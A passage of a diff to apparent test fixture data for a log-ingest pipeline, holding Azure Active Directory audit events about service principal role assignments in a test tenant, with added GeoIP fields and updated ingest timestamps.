"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -8056,6 +8560,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8222,7 +8738,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125080400Z", + "ingested": "2021-12-14T14:48:43.176665217Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -8249,6 +8765,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8415,7 +8943,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125087Z", + "ingested": "2021-12-14T14:48:43.176665791Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -8442,6 +8970,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8608,7 +9148,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125093800Z", + "ingested": "2021-12-14T14:48:43.176695629Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -8635,6 +9175,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8801,7 +9353,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125100400Z", + "ingested": "2021-12-14T14:48:43.176697121Z", "original": 